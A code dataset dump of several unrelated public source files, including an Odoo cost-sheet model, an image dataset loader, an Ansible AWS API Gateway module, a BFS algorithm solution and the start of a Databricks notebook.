\r\n facttotal = fields.Float(string ='Sub Factory Total Cost',compute='_compute_factorytotal',store =True)\r\n \r\n date = fields.Date(string=\"Date\")\r\n \r\n start_date = fields.Date(string=\"Start Date\")\r\n \r\n end_date = fields.Date(string=\"End Date\")\r\n \r\n pop = fields.Float(string ='Main Plastic')\r\n \r\n new1 = fields.Float(string ='Main Label')\r\n \r\n new2 = fields.Float(string ='Main Box')\r\n \r\n new3 = fields.Float(string ='Main String')\r\n \r\n new4 = fields.Float(string ='Main Other')\r\n \r\n ppitotal = fields.Float(string ='PPI Total',compute = '_compute_pptotal',store =True)\r\n \r\n originp = fields.Float(string ='Original Price')\r\n \r\n discount = fields.Float(string ='Discount (%)')\r\n \r\n sellprice = fields.Float(string ='Selling Price',compute ='_compute_sellprice',store =True)\r\n \r\n prototal = fields.Float(string ='Profit Total',compute ='_compute_prototal',store =True)\r\n \r\n proeach = fields.Float(string ='Profit Each',compute ='_compute_proeach',store =True)\r\n \r\n fselprice = fields.Float(string ='Factory Selling Price',compute ='_compute_factorysale',store =True)\r\n \r\n manu_count = fields.Integer(string ='Manufacturing',compute ='_compute_manu_count')\r\n\r\n \r\n @api.onchange('product_id')\r\n def _onchange_default_plb(self): \r\n prd_weight = self.product_id.product_tmpl_id.weight\r\n if prd_weight and prd_weight > 0:\r\n self.plb = prd_weight\r\n else:\r\n self.plb = 1 \r\n\r\n @api.onchange('product_uom_id')\r\n def _onchange_default_qty(self): \r\n uom_name = self.product_uom_id.name \r\n if uom_name == 'Dozens':\r\n self.qty = 12\r\n elif uom_name == 'PKG':\r\n self.qty = 10\r\n else:\r\n self.qty = 1\r\n \r\n @api.model\r\n def create(self , vals):\r\n vals['name'] = self.env['ir.sequence'].next_by_code('cost.sheet.sequence') or '/'\r\n return super(CostSheetTwo, self).create(vals)\r\n \r\n def write(self, vals): \r\n res = super(CostSheetTwo, self).write(vals)\r\n return res\r\n\r\n def confirm_expired(self):\r\n self.write({'status':'expired'})\r\n \r\n def update_cost(self):\r\n for rec in self:\r\n if rec.product_id:\r\n product = self.env['product.supplierinfo'].search([('product_tmpl_id', '=',rec.product_id.product_tmpl_id.id),('name', '=', rec.partner_id.id)]) \r\n if product:\r\n product.write({'x_studio_purchase_original_price': rec.fselprice,})\r\n notification = {\r\n 'type': 'ir.actions.client',\r\n 'tag': 'display_notification',\r\n 'params': {\r\n 'title': _('Info'),\r\n 'message': 'Updated the purchase price successfully!',\r\n 'sticky': False,\r\n }\r\n }\r\n return notification\r\n else:\r\n raise UserError(\"No vendor pricelist for that product!\")\r\n \r\n \r\n @api.onchange('product_id')\r\n def onchange_priceanddiscount(self):\r\n if self.product_id: \r\n bos =[]\r\n pricelist = self.env['product.pricelist.item'].search([('product_tmpl_id','=',self.product_id.product_tmpl_id.id)],order='create_date desc', limit=1) \r\n if pricelist:\r\n self.originp = pricelist.x_studio_original_sales_price\r\n self.discount = pricelist.percent_price\r\n else:\r\n self.originp = 0.0\r\n self.discount = 0.0\r\n \r\n boms = self.env['mrp.bom'].search([('product_tmpl_id','=',self.product_id.product_tmpl_id.id)])\r\n for bo in boms:\r\n bos.append(bo.id)\r\n return {'domain': {'bom_id': [('id', 'in', bos)] }}\r\n \r\n \r\n @api.onchange('bom_id')\r\n def onchange_raws(self):\r\n for rec in self:\r\n raws =[]\r\n boms = self.env['mrp.bom'].search([('id','=',rec.bom_id.id)]) \r\n for line in boms.bom_line_ids:\r\n if line.product_id.categ_id.name == 'Raw Materials':\r\n raws.append(line.product_id.id)\r\n rec.raw_ids = raws\r\n# return {'domain': {'raw_ids': [('id', 'in', raws)]}}\r\n \r\n \r\n @api.onchange('avg_sale', 'bom_id','start_date','end_date')\r\n def onchangeline(self): \r\n data_values = [(5,0,0)]\r\n values = [] \r\n self.material_cost = self.labcost = self.bag = self.label = self.meter = self.metal = self.box = self.diesel = self.other = self.pop = self.new1 = self.new2 = self.new3 = self.new4 = 0.0\r\n boms = self.env['mrp.bom'].search([('id','=',self.bom_id.id)]) \r\n start_date = self.start_date\r\n end_date = self.end_date\r\n if start_date and end_date and self.avg_sale:\r\n if not boms:\r\n raise UserError(\"Please choose the BoM first!\")\r\n else:\r\n rawmaterialavg = labouravg= plasticavg = labelavg = meteravg = metalavg = boxavg = dieselavg = otheravg = mainavg = mainlabelavg = mainboxavg = mainstringavg = mainotheravg = rawqty = labourqty = plasticqty = labelqty = meterqty = metalqty = boxqty = dieselqty = otherqty = mainqty = mainlabelqty = mainboxqty = mainstringqty = mainotherqty = 0.0\r\n invoices = self.env['account.move'].search([('type', '=', 'out_invoice'),'&', ('invoice_date','>=',start_date),('invoice_date','<=',end_date)])\r\n for line in boms.bom_line_ids:\r\n ttl_amt = ttl_qty = 0.0\r\n for inv in invoices.invoice_line_ids:\r\n if line.product_id.id==inv.product_id.id: \r\n ttl_amt += inv.price_subtotal\r\n ttl_qty += inv.quantity\r\n \r\n if ttl_amt == 0:\r\n total = line.product_id.standard_price\r\n ttl_amt = 0.0\r\n ttl_qty = 0.0\r\n\r\n else: # find the avg. sale price\r\n total = round(ttl_amt / ttl_qty, 2)\r\n\r\n line_vals = {\r\n 'product_id': line.product_id.id,\r\n 'category_id': line.product_id.categ_id.id,\r\n 'total_amt': ttl_amt, # total sale prices within the selected date range (or) 0 for default case\r\n 'total_qty': ttl_qty, # total quantities within the selected date range (or) 0 for default case\r\n 'total': total, # avg. sale price within the selected date range or standard sale price (default)\r\n 'qty': line.product_qty,\r\n 'cost': total * line.product_qty\r\n }\r\n \r\n if line_vals.get(\"category_id\")==3334:\r\n rawmaterialavg += line_vals.get(\"cost\")\r\n rawqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3320:\r\n labouravg += line_vals.get(\"cost\")\r\n # labourqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3327:\r\n plasticavg += line_vals.get(\"cost\")\r\n # plasticqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3321:\r\n labelavg += line_vals.get(\"cost\")\r\n # labelqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3324:\r\n meteravg += line_vals.get(\"cost\")\r\n # meterqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3323:\r\n metalavg += line_vals.get(\"cost\")\r\n # metalqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3322:\r\n boxavg += line_vals.get(\"cost\")\r\n # boxqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3325:\r\n dieselavg += line_vals.get(\"cost\")\r\n # dieselqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3326:\r\n otheravg += line_vals.get(\"cost\")\r\n # otherqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3328:\r\n mainavg += line_vals.get(\"cost\")\r\n # mainqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3329:\r\n mainlabelavg += line_vals.get(\"cost\")\r\n # mainlabelqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3330:\r\n mainboxavg += line_vals.get(\"cost\")\r\n # mainboxqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3331:\r\n mainstringavg += line_vals.get(\"cost\")\r\n # mainstringqty += line_vals.get(\"qty\")\r\n elif line_vals.get(\"category_id\")==3332:\r\n mainotheravg += line_vals.get(\"cost\")\r\n # mainotherqty += line_vals.get(\"qty\")\r\n \r\n data_values.append((0, 0, line_vals))\r\n self.update({'costsheet_lines': data_values}) \r\n \r\n if rawqty != 0:\r\n self.material_cost = rawmaterialavg/rawqty\r\n self.labcost = labouravg\r\n self.bag = plasticavg\r\n self.label = labelavg\r\n self.meter = meteravg\r\n self.metal = metalavg\r\n self.box = boxavg\r\n self.diesel = dieselavg\r\n self.other = otheravg\r\n self.pop = mainavg\r\n self.new1 = mainlabelavg\r\n self.new2 = mainboxavg\r\n self.new3 = mainstringavg\r\n self.new4 = mainotheravg \r\n \r\n else: # default case\r\n data_values = [(5,0,0)]\r\n rawtotal = rawquantity = labourtotal = labourquantity = plastictotal = plasticquantity = labeltotal = labelquantity = metertotal = meterquantity = metaltotal = metalquantity = boxtotal = boxquantity = dieseltotal = dieselquantity = othertotal = otherquantity = maintotal = mainlabeltotal = mainboxtotal = mainstringtotal= mainothertotal = mainquantity = mainlabelquantity = mainboxquantity = mainstringquantity = mainotherquantity = totoalrawavg = 0.0\r\n for line in boms.bom_line_ids:\r\n default_cost = line.product_id.standard_price * line.product_qty\r\n default_qty = line.product_qty \r\n if line.product_id.categ_id.id == 3334: \r\n rawtotal += default_cost\r\n rawquantity += default_qty\r\n elif line.product_id.categ_id.id == 3320: \r\n labourtotal += default_cost\r\n # labourquantity += default_qty\r\n elif line.product_id.categ_id.id == 3327: \r\n plastictotal += default_cost\r\n # plasticquantity += default_qty\r\n elif line.product_id.categ_id.id == 3321:\r\n labeltotal += default_cost\r\n # labelquantity += default_qty\r\n elif line.product_id.categ_id.id == 3324:\r\n metertotal += default_cost\r\n # meterquantity += default_qty\r\n elif line.product_id.categ_id.id == 3323:\r\n metaltotal += default_cost\r\n # metalquantity += default_qty\r\n elif line.product_id.categ_id.id == 3322:\r\n boxtotal += default_cost\r\n # boxquantity += default_qty\r\n elif line.product_id.categ_id.id == 3325:\r\n dieseltotal += default_cost\r\n # dieselquantity += default_qty\r\n elif line.product_id.categ_id.id == 3326:\r\n othertotal += default_cost\r\n # otherquantity += default_qty\r\n elif line.product_id.categ_id.id == 3328:\r\n maintotal += default_cost\r\n # mainquantity += default_qty\r\n elif line.product_id.categ_id.id == 3329:\r\n mainlabeltotal += default_cost\r\n # mainlabelquantity += default_qty\r\n elif line.product_id.categ_id.id == 3330:\r\n mainboxtotal += default_cost\r\n # mainboxquantity += default_qty\r\n elif line.product_id.categ_id.id == 3331:\r\n mainstringtotal += default_cost\r\n # mainstringquantity += default_qty\r\n elif line.product_id.categ_id.id == 3332:\r\n mainothertotal += default_cost\r\n # mainotherquantity += default_qty\r\n \r\n line_vals = {\r\n 'product_id': line.product_id.id,\r\n 'category_id': line.product_id.categ_id.id,\r\n 'total_amt': 0.0,\r\n 'total_qty': 0.0,\r\n 'total': line.product_id.standard_price,\r\n 'qty': default_qty,\r\n 'cost': default_cost \r\n }\r\n \r\n data_values.append((0, 0, line_vals)) \r\n self.update({'costsheet_lines': data_values})\r\n \r\n if rawquantity != 0: \r\n self.material_cost = rawtotal/rawquantity\r\n self.labcost = labourtotal\r\n self.bag = plastictotal\r\n self.label = labeltotal\r\n self.meter = metertotal\r\n self.metal = metaltotal\r\n self.box = boxtotal\r\n self.diesel = dieseltotal\r\n self.other = othertotal\r\n self.pop = maintotal\r\n self.new1 = mainlabeltotal\r\n self.new2 = mainboxtotal\r\n self.new3 = mainstringtotal\r\n self.new4 = mainothertotal \r\n \r\n \r\n \r\n \r\n @api.depends('material_cost','labcost')\r\n def _compute_total(self):\r\n for rec in self:\r\n rec.total = rec.material_cost + rec.labcost\r\n \r\n @api.depends('total','plb')\r\n def _compute_unit_cost(self):\r\n for rec in self:\r\n if rec.plb != 0:\r\n rec.unitcost = rec.total / rec.plb\r\n \r\n @api.depends('unitcost','qty')\r\n def _compute_amount(self):\r\n for rec in self:\r\n rec.amount = rec.unitcost * rec.qty\r\n \r\n \r\n @api.depends('amount','bag','label','other','meter','diesel','metal')\r\n def _compute_factorytotal(self):\r\n for rec in self:\r\n rec.facttotal = rec.amount + rec.bag + rec.label + rec.other + rec.meter + rec.diesel + rec.metal + rec.box\r\n \r\n \r\n @api.depends('pop','new1','new2','new3','new4')\r\n def _compute_pptotal(self):\r\n for rec in self:\r\n rec.ppitotal = rec.pop + rec.new1 + rec.new2 + rec.new3 + rec.new4\r\n \r\n @api.depends('originp','discount',)\r\n def _compute_sellprice(self):\r\n for rec in self:\r\n rec.sellprice = rec.originp - (rec.originp *(rec.discount/100))\r\n \r\n @api.depends('sellprice','facttotal','ppitotal')\r\n def _compute_prototal(self):\r\n for rec in self:\r\n rec.prototal = rec.sellprice - (rec.facttotal + rec.ppitotal)\r\n \r\n @api.depends('prototal',)\r\n def _compute_proeach(self):\r\n for rec in self:\r\n rec.proeach = rec.prototal/2\r\n \r\n @api.depends('proeach','facttotal')\r\n def _compute_factorysale(self):\r\n for rec in self:\r\n rec.fselprice = rec.proeach + rec.facttotal\r\n \r\n \r\n\r\n def _compute_manu_count(self):\r\n for rec in self:\r\n count = self.env['mrp.production'].search([('costsheet_id','=',self.id)])\r\n self.manu_count =len(count)\r\n \r\n \r\n def action_manufacturing_list(self):\r\n return {\r\n 'name': _('Manufacturing Orders'),\r\n 'domain': [('costsheet_id','=',self.id)],\r\n 'res_model': 'mrp.production',\r\n 'view_id': False,\r\n 'view_mode': 'tree',\r\n 'type': 'ir.actions.act_window',\r\n }\r\n \r\n \r\n \r\n \r\n \r\n \r\nclass CostSheetLine(models.Model):\r\n \r\n _name = 'cost.sheet.line'\r\n _description = 'Cost Sheet Line'\r\n \r\n cosheet_id = fields.Many2one('cost.sheet.two', string=\"CostSheetLine\")\r\n\r\n company_id = fields.Many2one('res.company', string='Company', readonly=True, default=lambda self: self.env.company.id)\r\n \r\n product_id = fields.Many2one('product.product', string=\"Product\")\r\n\r\n product_uom_id = fields.Many2one('uom.uom', related='product_id.uom_id', string='UoM')\r\n \r\n category_id = fields.Many2one('product.category', string=\"Category\")\r\n \r\n total = fields.Float(string ='Total', help=\"Standard sale price (default case) or avg. sale price for the selected date range!\")\r\n \r\n qty = fields.Float(string ='Quantity')\r\n \r\n cost = fields.Float(string ='Cost', help=\"Cost = Total * Quantity\")\r\n \r\n total_amt = fields.Float(string=\"Total Amount\", default=0.0, help=\"Total sales amount within the selected date range (0 for default)!\")\r\n\r\n total_qty = fields.Float(string=\"Total Quantity\", default=0.0, help=\"Total sales quantity within the selected date range (0 for default)!\")\r\n \r\n \r\n @api.model\r\n def create(self , vals):\r\n res = super(CostSheetLine, self).create(vals)\r\n return res\r\n \r\n def write(self, vals): \r\n res = super(CostSheetLine, self).write(vals)\r\n return res\r\n \r\n\r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"mmdg2019/ppg","sub_path":"sheet_new_two/models/cost_sheet.py","file_name":"cost_sheet.py","file_ext":"py","file_size_in_byte":22088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33144225747","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport numpy as np\n\nfrom collections import defaultdict\nimport re\nimport cv2\nfrom scipy import random\n\n# Whitening algorithm\ndef svd_whiten(X):\n U, s, Vt = np.linalg.svd(X)\n\n # U and Vt are the singular matrices, and s contains the singular values.\n # Since the rows of both U and Vt are orthonormal vectors, then U * Vt\n # will be white\n X_white = np.dot(U, Vt)\n\n return X_white\n\nclass DataSet(object):\n\n def __init__(self, inputDir, labelsFile, nClasses = 38):\n self.indexInEpoch = 0\n self.epochsCompleted = 0\n\n self.inputDir = inputDir\n output = np.genfromtxt(labelsFile, skip_header=1, dtype=[('image', 'S13'), ('label', 'S11')], delimiter=',')\n\n self.images = []\n\n for file in os.listdir(inputDir):\n if (file.endswith('.jpg')):\n self.images.append(file)\n\n self.allImages = [x[0] for x in output]\n self.allLabels = [int(re.search(\"whale_(\\\\d+)\", x[1]).group(1)) for x in output]\n\n # sorted list of unique whale ids\n self.classes = sorted(set(self.allLabels))\n self.numberOfClasses = len(set(self.classes))\n assert self.numberOfClasses == 38\n\n self.labels = []\n for file in self.images:\n ind = self.allImages.index(file)\n cl = self.allLabels[ind]\n # assign a class from 0 to 37\n newClass = self.classes.index(cl)\n self.labels.append(newClass)\n\n # Format the Y for this step\n self.yTrain = np.zeros((len(self.labels), nClasses))\n for j in xrange(len(self.labels)):\n self.yTrain[j][self.labels[j]] = 1\n self.images = np.array(self.images)\n\n @property\n def num_examples(self):\n return len(self.images)\n\n @property\n def epochs_completed(self):\n return self.epochsCompleted\n\n def getAll(self):\n return self.read_images([os.path.join(self.inputDir, x) for x in self.images]), self.yTrain\n\n def get_random_batch(self, batchSize):\n randInd = random.permutation(len(self.images))[:batchSize]\n return self.read_images([os.path.join(self.inputDir, x) for x in self.images[randInd]]), self.yTrain[randInd]\n\n def get_sequential_batch(self, batchSize):\n start = self.indexInEpoch\n self.indexInEpoch += batchSize\n if self.indexInEpoch > self.num_examples:\n # Finished epoch\n self.epochsCompleted += 1\n # Shuffle the data\n perm = np.arange(self.num_examples)\n np.random.shuffle(perm)\n self.images = self.images[perm]\n self.yTrain = self.yTrain[perm]\n # Start next epoch\n start = 0\n self.indexInEpoch = batchSize\n assert batchSize <= self.num_examples\n end = self.indexInEpoch\n return self.read_images([os.path.join(self.inputDir, x) for x in self.images[start:end]]), self.yTrain[start:end], self.images[start:end]\n\n def read_images(self, filenames):\n images = []\n\n for file in filenames:\n im = cv2.imread(file, flags=cv2.IMREAD_GRAYSCALE)\n normIm = im.astype(float)\n\n normIm = (normIm/255)\n # normIm = cv2.resize(normIm, (227,227))\n images.append(np.reshape(normIm, (normIm.shape[0], normIm.shape[1], 1)))\n return np.asarray(images)\n\ndef read_data_sets(trainDir, validationDir, trainFile, validationFile):\n class DataSets(object):\n pass\n\n data_sets = DataSets()\n\n data_sets.train = DataSet(trainDir, trainFile)\n data_sets.validation = DataSet(validationDir, validationFile)\n\n return data_sets\n","repo_name":"andpol5/whaleDetector","sub_path":"alphaWhales/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8627920648","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\nops = webdriver.ChromeOptions()\nops.add_argument(\"--disable-notifications\")\nserv = Service(\"C:\\DRIVERS\\chromedriver.exe\")\ndriver = webdriver.Chrome(service=serv, options=ops)\nurl = \"https://whatmylocation.com\"\ndriver.get(url)\ndriver.maximize_window()","repo_name":"JepoyOnlineTraining/SeleniumPython","sub_path":"day 19 - Selenium/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38435832346","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\nDOCUMENTATION = '''\n---\nmodule: aws_api_gateway\nshort_description: Manage AWS API Gateway APIs\ndescription:\n - Allows for the management of API Gatway APIs\n - Normally you should give the api_id since there is no other\n stable guaranteed unique identifier for the API. If you do\n not give api_id then a new API will be create each time\n this is run.\n - Beware that there are very hard limits on the rate that\n you can call API Gateway's REST API. You may need to patch\n your boto. See https://github.com/boto/boto3/issues/876\n and discuss with your AWS rep.\n - swagger_file and swagger_text are passed directly on to AWS\n transparently whilst swagger_dict is an ansible dict which is\n converted to JSON before the API definitions are uploaded.\nversion_added: '2.4'\nrequirements: [ boto3 ]\noptions:\n api_id:\n description:\n - The ID of the API you want to manage.\n state:\n description:\n - NOT IMPLEMENTED Create or delete API - currently we always create.\n default: present\n choices: [ 'present', 'absent' ]\n swagger_file:\n description:\n - JSON or YAML file containing swagger definitions for API.\n Exactly one of swagger_file, swagger_text or swagger_dict must\n be present.\n swagger_text:\n description:\n - Swagger definitions for API in JSON or YAML as a string direct\n from playbook.\n swagger_dict:\n description:\n - Swagger definitions API ansible dictionary which will be\n converted to JSON and uploaded.\n stage:\n description:\n - The name of the stage the API should be deployed to.\n deploy_desc:\n description:\n - Description of the deployment - recorded and visible in the\n AWS console.\n default: Automatic deployment by Ansible.\nauthor:\n - 'Michael De La Rue (@mikedlr)'\nextends_documentation_fragment:\n - aws\nnotes:\n - A future version of this module will probably use tags or another\n ID so that an API can be create only once.\n - As an early work around an intermediate version will probably do\n the same using a tag embedded in the API name.\n\n'''\n\nEXAMPLES = '''\n# Update API resources for development\ntasks:\n- name: update API\n aws_api_gateway:\n api_id: 'abc123321cba'\n state: present\n swagger_file: my_api.yml\n\n# update definitions and deploy API to production\ntasks:\n- name: deploy API\n aws_api_gateway:\n api_id: 'abc123321cba'\n state: present\n swagger_file: my_api.yml\n stage: production\n deploy_desc: Make auth fix available.\n'''\n\nRETURN = '''\noutput:\n description: the data returned by put_restapi in boto3\n returned: success\n type: dict\n sample:\n 'data':\n {\n \"id\": \"abc123321cba\",\n \"name\": \"MY REST API\",\n \"createdDate\": 1484233401\n }\n'''\n\nimport json\n\ntry:\n import botocore\n HAS_BOTOCORE = True\nexcept ImportError:\n HAS_BOTOCORE = False\n\nfrom ansible.module_utils.basic import AnsibleModule, traceback\nfrom ansible.module_utils.ec2 import (AWSRetry, HAS_BOTO3, ec2_argument_spec, get_aws_connection_info,\n boto3_conn, camel_dict_to_snake_dict)\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(\n dict(\n api_id=dict(type='str', required=False),\n state=dict(type='str', default='present', choices=['present', 'absent']),\n swagger_file=dict(type='path', default=None, aliases=['src', 'api_file']),\n swagger_dict=dict(type='json', default=None),\n swagger_text=dict(type='str', default=None),\n stage=dict(type='str', default=None),\n deploy_desc=dict(type='str', default=\"Automatic deployment by Ansible.\"),\n )\n )\n\n mutually_exclusive = [['swagger_file', 'swagger_dict', 'swagger_text']] # noqa: F841\n\n module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False,\n mutually_exclusive=mutually_exclusive)\n\n api_id = module.params.get('api_id')\n state = module.params.get('state') # noqa: F841\n swagger_file = module.params.get('swagger_file')\n swagger_dict = module.params.get('swagger_dict')\n swagger_text = module.params.get('swagger_text')\n stage = module.params.get('stage')\n deploy_desc = module.params.get('deploy_desc')\n\n# check_mode = module.check_mode\n changed = False\n\n if not HAS_BOTO3:\n module.fail_json(msg='Python module \"boto3\" is missing, please install boto3')\n\n if not HAS_BOTOCORE:\n module.fail_json(msg='Python module \"botocore\" is missing, please install it')\n\n region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)\n try:\n client = boto3_conn(module, conn_type='client', resource='apigateway',\n region=region, endpoint=ec2_url, **aws_connect_kwargs)\n except botocore.exceptions.NoRegionError:\n module.fail_json(msg=\"Region must be specified as a parameter, in \"\n \"AWS_DEFAULT_REGION environment variable or in boto configuration file\")\n except (botocore.exceptions.ValidationError, botocore.exceptions.ClientError) as e:\n fail_json_aws(module, e, msg=\"connecting to AWS\")\n\n changed = True # for now it will stay that way until we can sometimes avoid change\n\n conf_res = None\n dep_res = None\n del_res = None\n\n if state == \"present\":\n if api_id is None:\n api_id = create_empty_api(module, client)\n api_data = get_api_definitions(module, swagger_file=swagger_file,\n swagger_dict=swagger_dict, swagger_text=swagger_text)\n conf_res, dep_res = ensure_api_in_correct_state(module, client, api_id=api_id,\n api_data=api_data, stage=stage,\n deploy_desc=deploy_desc)\n if state == \"absent\":\n del_res = delete_rest_api(module, client, api_id)\n\n exit_args = {\"changed\": changed, \"api_id\": api_id}\n\n if conf_res is not None:\n exit_args['configure_response'] = camel_dict_to_snake_dict(conf_res)\n if dep_res is not None:\n exit_args['deploy_response'] = camel_dict_to_snake_dict(dep_res)\n if del_res is not None:\n exit_args['delete_response'] = camel_dict_to_snake_dict(del_res)\n\n module.exit_json(**exit_args)\n\n\ndef get_api_definitions(module, swagger_file=None, swagger_dict=None, swagger_text=None):\n apidata = None\n if swagger_file is not None:\n try:\n with open(swagger_file) as f:\n apidata = f.read()\n except OSError as e:\n msg = \"Failed trying to read swagger file {}: {}\".format(str(swagger_file), str(e))\n module.fail_json(msg=msg, exception=traceback.format_exc())\n if swagger_dict is not None:\n apidata = json.dumps(swagger_dict)\n if swagger_text is not None:\n apidata = swagger_text\n\n if apidata is None:\n module.fail_json(msg='module error - failed to get API data')\n return apidata\n\n\ndef create_empty_api(module, client):\n \"\"\"\n creates a new empty API ready to be configured. The description is\n temporarily set to show the API as incomplete but should be\n updated when the API is configured.\n \"\"\"\n desc = \"Incomplete API creation by ansible aws_api_gateway module\"\n try:\n awsret = create_api(client, name=\"ansible-temp-api\", description=desc)\n except (botocore.exceptions.ClientError, botocore.exceptions.EndpointConnectionError) as e:\n fail_json_aws(module, e, msg=\"creating API\")\n return awsret[\"id\"]\n\n\ndef delete_rest_api(module, client, api_id):\n \"\"\"\n creates a new empty API ready to be configured. The description is\n temporarily set to show the API as incomplete but should be\n updated when the API is configured.\n \"\"\"\n try:\n delete_response = delete_api(client, api_id=api_id)\n except (botocore.exceptions.ClientError, botocore.exceptions.EndpointConnectionError) as e:\n fail_json_aws(module, e, msg=\"deleting API {}\".format(api_id))\n return delete_response\n\n\ndef ensure_api_in_correct_state(module, client, api_id=None, api_data=None, stage=None,\n deploy_desc=None):\n \"\"\"Make sure that we have the API configured and deployed as instructed.\n\n This function first configures the API correctly uploading the\n swagger definitions and then deploys those. Configuration and\n deployment should be closely tied because there is only one set of\n definitions so if we stop, they may be updated by someone else and\n then we deploy the wrong configuration.\n \"\"\"\n\n configure_response = None\n try:\n configure_response = configure_api(client, api_data=api_data, api_id=api_id)\n except (botocore.exceptions.ClientError, botocore.exceptions.EndpointConnectionError) as e:\n fail_json_aws(module, e, msg=\"configuring API {}\".format(api_id))\n\n deploy_response = None\n\n if stage:\n try:\n deploy_response = create_deployment(client, api_id=api_id, stage=stage,\n description=deploy_desc)\n except (botocore.exceptions.ClientError, botocore.exceptions.EndpointConnectionError) as e:\n msg = \"deploying api {} to stage {}\".format(api_id, stage)\n fail_json_aws(module, e, msg)\n\n return configure_response, deploy_response\n\n\n# There is a PR open to merge fail_json_aws this into the standard module code;\n# see https://github.com/ansible/ansible/pull/23882\ndef fail_json_aws(module, exception, msg=None):\n \"\"\"call fail_json with processed exception\n function for converting exceptions thrown by AWS SDK modules,\n botocore, boto3 and boto, into nice error messages.\n \"\"\"\n last_traceback = traceback.format_exc()\n\n try:\n except_msg = exception.message\n except AttributeError:\n except_msg = str(exception)\n\n if msg is not None:\n message = '{}: {}'.format(msg, except_msg)\n else:\n message = except_msg\n\n try:\n response = exception.response\n except AttributeError:\n response = None\n\n if response is None:\n module.fail_json(msg=message, traceback=last_traceback)\n else:\n module.fail_json(msg=message, traceback=last_traceback,\n **camel_dict_to_snake_dict(response))\n\n\nretry_params = {\"tries\": 10, \"delay\": 5, \"backoff\": 1.2}\n\n\n@AWSRetry.backoff(**retry_params)\ndef create_api(client, name=None, description=None):\n return client.create_rest_api(name=\"ansible-temp-api\", description=description)\n\n\n@AWSRetry.backoff(**retry_params)\ndef delete_api(client, api_id=None):\n return client.delete_rest_api(restApiId=api_id)\n\n\n@AWSRetry.backoff(**retry_params)\ndef configure_api(client, api_data=None, api_id=None, mode=\"overwrite\"):\n return client.put_rest_api(body=api_data, restApiId=api_id, mode=mode)\n\n\n@AWSRetry.backoff(**retry_params)\ndef create_deployment(client, api_id=None, stage=None, description=None):\n # we can also get None as an argument so we don't do this as a defult\n return client.create_deployment(restApiId=api_id, stageName=stage, description=description)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zhxfei/My-Admin","sub_path":"env/lib/python3.5/site-packages/ansible/modules/cloud/amazon/aws_api_gateway.py","file_name":"aws_api_gateway.py","file_ext":"py","file_size_in_byte":11521,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"18537948075","text":"# 안전 영역 S1\nimport sys\nfrom collections import deque\nimport copy\n\ninput = sys.stdin.readline\nn = int(input())\narr = []\nheight = set()\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\nvisited = [[False] * n for i in range(n)]\nfor i in range(n):\n tmp = list(map(int, input().split()))\n arr.append(tmp)\n height.update(tmp) # set으로 모든 높이 저장\n\n\ndef bfs(i, j, h, new_arr):\n q = deque()\n q.append([i, j])\n visited[i][j] = False\n while q:\n x, y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < n and 0 <= ny < n and not visited[nx][ny]:\n if new_arr[nx][ny] > h:\n q.append([nx, ny])\n new_arr[nx][ny] = 0\n visited[nx][ny] = True\n\n\nans = []\nfor i in height:\n new_arr = copy.deepcopy(arr) # 깊은 복사로 새로운 배열 생성\n cnt = 0\n for j in range(n):\n for k in range(n):\n if new_arr[j][k] > i: # 잠기지 않은 영역이면\n bfs(j, k, i, new_arr) # bfs 진행\n cnt += 1\n if cnt == 0: # 아무 지역도 안잠길 경우\n ans.append(1)\n else:\n ans.append(cnt)\n visited = [[False] * n for i in range(n)] # 방문 초기화\n\nprint(max(ans))\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"그래프/2468.py","file_name":"2468.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12489216591","text":"# Databricks notebook source\n# MAGIC %md \n# MAGIC You may find this series of notebooks at https://github.com/databricks-industry-solutions/psm. For more information about this solution accelerator, visit https://www.databricks.com/blog/2020/10/20/detecting-at-risk-patients-with-real-world-data.html.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Data preparation and QC\n# MAGIC In this notebook we start by creating cohorts based on our study design using synthea resources that are already loaded into delta (using `1-data-ingest` notebook).\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## 0. Initial Setup\n# MAGIC First we run `./0-config` notebook to configure our project's environment by setting up the base path, deltalake path, mlflow experiment etc. We then run `./cohort_builder` notebook to import `DeltaEHR` class 